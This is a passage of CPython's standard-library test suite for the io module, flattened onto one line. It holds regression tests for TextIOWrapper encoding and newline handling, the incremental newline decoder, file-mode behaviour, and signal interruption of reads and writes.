test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('foo\n') txt.reconfigure(encoding='utf-8-sig') txt.write('\xe9\n') txt.flush() self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n') def test_reconfigure_write(self): # latin -> utf8 raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') txt.write('abc\xe9\n') txt.reconfigure(encoding='utf-8') self.assertEqual(raw.getvalue(), b'abc\xe9\n') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n') # ascii -> utf-8-sig: ensure that no BOM is written in the middle of # the file raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n') def test_reconfigure_write_non_seekable(self): raw = self.BytesIO() raw.seekable = lambda: False raw.seek = None txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() # If the raw stream is not seekable, there'll be a BOM self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n') def test_reconfigure_defaults(self): txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n') txt.reconfigure(encoding=None) self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.write('LF\n') txt.reconfigure(newline='\r\n') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.reconfigure(errors='ignore') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'ignore') txt.write('CRLF\n') txt.reconfigure(encoding='utf-8', newline=None) self.assertEqual(txt.errors, 'strict') txt.seek(0) self.assertEqual(txt.read(), 'LF\nCRLF\n') self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n') def test_reconfigure_newline(self): raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.read() t.tell() t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.write('x') t.tell() class MemviewBytesIO(io.BytesIO): '''A BytesIO object whose read method returns memoryviews rather than bytes''' def read1(self, len_): return _to_memoryview(super().read1(len_)) def read(self, len_): return _to_memoryview(super().read(len_)) def _to_memoryview(buf): '''Convert bytes-object *buf* to a non-trivial memoryview''' arr = array.array('i') idx = len(buf) - len(buf) % arr.itemsize arr.frombytes(buf[:idx]) return memoryview(arr) class CTextIOWrapperTest(TextIOWrapperTest): io = io shutdown_error = "LookupError: unknown encoding: ascii" def test_initialization(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') self.assertRaises(ValueError, t.read) t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) def test_garbage_collection(self): # C TextIOWrapper objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends in gc.garbage instead. with warnings_helper.check_warnings(('', ResourceWarning)): rawio = io.FileIO(os_helper.TESTFN, "wb") b = self.BufferedWriter(rawio) t = self.TextIOWrapper(b, encoding="ascii") t.write("456def") t.x = t wr = weakref.ref(t) del t support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"456def") def test_rwpair_cleared_before_textio(self): # Issue 13070: TextIOWrapper's finalization would crash when called # after the reference to the underlying BufferedRWPair's writer got # cleared by the GC. for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with warnings_helper.check_warnings(('', DeprecationWarning)): f = self.open(os_helper.TESTFN, "U") self.assertEqual(f.name, os_helper.TESTFN) self.assertEqual(f.buffer.name, os_helper.TESTFN) self.assertEqual(f.buffer.raw.name, os_helper.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(os_helper.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(os_helper.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, bytearray(1024)) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(os_helper.TESTFN, "wb") self._check_warn_on_dealloc(os_helper.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with warnings_helper.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with self.open(os_helper.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(os_helper.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(os_helper.TESTFN, 'xb') as f: f.write(b"spam") with self.open(os_helper.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = import_helper.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. test_reentrant_write_buffered = None test_reentrant_write_text = None def load_tests(*args): tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest, PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest, CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest, PyBufferedRandomTest, StatefulIncrementalDecoderTest, CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest, CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest, CSignalsTest, PySignalsTest, ) # Put the namespaces of the IO module we are testing and some useful mock # classes in the __dict__ of each test. mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO, MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead, SlowFlushRawIO) all_members = io.__all__ + ["IncrementalNewlineDecoder"] c_io_ns = {name : getattr(io, name) for name in all_members} py_io_ns = {name : getattr(pyio, name) for name in all_members} globs = globals() c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks) py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks) # Avoid turning open into a bound method. py_io_ns["open"] = pyio.OpenWrapper for test in tests: if test.__name__.startswith("C"): for name, obj in c_io_ns.items(): setattr(test, name, obj) elif test.__name__.startswith("Py"): for name, obj in py_io_ns.items(): setattr(test, name, obj) suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests]) return suite if __name__ == "__main__": unittest.main()
convert.py
